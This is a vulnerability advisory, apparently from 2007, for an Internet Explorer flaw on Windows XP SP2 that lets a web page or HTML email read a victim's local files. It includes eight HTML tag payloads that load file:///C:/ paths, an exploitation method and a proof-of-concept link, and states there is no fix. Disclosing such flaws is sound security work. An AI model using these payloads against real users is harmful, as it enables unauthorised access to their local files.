---------------------------------------------------------------------
*h)* Script Tag Local File Accesses:
---------------------------------------------------------------------
---------------------------------------------------------------------
*Exploitation method:*
- Creates a web page or an HTML Mail with the vulnerable code
- When the victim opens the mail or visit the vulnerable site it is
possible to accesses his local files.
*Demonstration:*
Note: Demonstration will try to accesses few default images and wave
files
- Visit the POC
- If vulnerable internet explorer is used it will show your local
sample images and give a proper alert.
*Solution:*
No solution
*Screenshot:
*http://www.xdisclose.com/images/xdiscloselocalie.jpg
*Proof Of Concept:*
http://www.xdisclose.com/poc/xdiscloselocalie.html
*Impact:*
A Remote user can get accesses to victims local system files.
Scope of impact is limited to system level.
*Original Advisory:
*http://www.xdisclose.com/XD100099.txt
*Credits:*
Rajesh Sethumadhavan has been credited with the discovery of this
vulnerability
*Disclaimer:*
This entire document is strictly for educational, testing and
demonstrating purpose only. Modification use and/or publishing this
information is entirely on your own risk. The exploit code is to be
used on your testing environment only. I am not liable for any direct
or indirect damages caused as a result of using the information or
demonstrations provided in any part of this advisory.
Thanks
Regards
Rajesh Sethumadhavan
------=_Part_62066_21441314.1171923899761
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Microsoft Internet Explorer Local File Accesses Vulnerability
#####################################################################
#####################################################################
Overview:
Microsoft Internet Explorer is a default browser bundled with all
versions of Microsoft Windows operating system.
Description:
A vulnerability has been identified in Microsoft Internet Explorer,
(default installation) in windows XP service pack 2 which could be
exploited by malicious users to obtain victims local files. This flaw
is due to an error in the way Microsoft Internet explorer handles
different html tags. Which could be exploited by a malicious remote
user to obtain sensitive local files from the victim's computer.
a) Embed Tag Local file Accesses:
---------------------------------------------------------------------
<EMBED SRC="file:///C:/test.pdf" HEIGHT=600 WIDTH=1440></EMBED>
---------------------------------------------------------------------
b) Object & Param Tag Local File Accesses:
---------------------------------------------------------------------
<object type="audio/x-mid" data="
file:///C:/test.mid" width="200"
height="20">
<param name="src" value="file:///C:/test.mid">
<param name="autoStart" value="true">
<param name="autoStart" value="0">
</object>
---------------------------------------------------------------------
c) Body Tag Local File Accesses:
---------------------------------------------------------------------
<body background="file:///C:/test.gif" onload="alert('loading body
bgrd success')" onerror="alert('loading body bgrd error')">
---------------------------------------------------------------------
d) Style Tag Local File Accesses:
---------------------------------------------------------------------
<STYLE type="text/css">BODY{background:url("
file:///C:/test.gif")}
</STYLE>
---------------------------------------------------------------------
e) Bgsound Tag Local File Accesses:
---------------------------------------------------------------------
<bgsound src="file:///C:/test.mid" id="soundeffect" loop=1 autostart=
"true"/>
---------------------------------------------------------------------
f) Input Tag Local File Accesses:
---------------------------------------------------------------------
<form>
<input type="image" src="
file:///C:/test.gif" onload="alert('loading
input success')" onerror="alert('loading input error')">
</form>
---------------------------------------------------------------------
g) Image Tag Local File Accesses:
---------------------------------------------------------------------
<img src="file:///C:/test.jpg" onload="alert('loading image success')"
onerror="alert('loading image error')">
---------------------------------------------------------------------
h) Script Tag Local File Accesses:
---------------------------------------------------------------------
<script src="file:///C:/test.js"></script
>
---------------------------------------------------------------------
Exploitation method:
- Creates a web page or an HTML Mail with the vulnerable code
- When the victim opens the mail or visit the vulnerable site it is
possible to accesses his local files.
Demonstration:
Note: Demonstration will try to accesses few default images and wave
files
- Visit the POC
- If vulnerable internet explorer is used it will show your local
sample images and give a proper alert.
Solution:
No solution
Screenshot:
http://www.xdisclose.com/images/xdiscloselocalie.jpg
Proof Of Concept:
http://www.xdisclose.com/poc/xdiscloselocalie.html
Impact:
A Remote user can get accesses to victims local system files.
Scope of impact is limited to system level.
Original Advisory:
http://www.xdisclose.com/XD100099.txt
Credits:
Rajesh Sethumadhavan has been credited with the discovery of this
vulnerability
Disclaimer:
This entire document is strictly for educational, testing and
demonstrating purpose only. Modification use and/or publishing this
information is entirely on your own risk. The exploit code is to be
used on your testing environment only. I am not liable for any direct
or indirect damages caused as a result of using the information or
demonstrations provided in any part of this advisory.
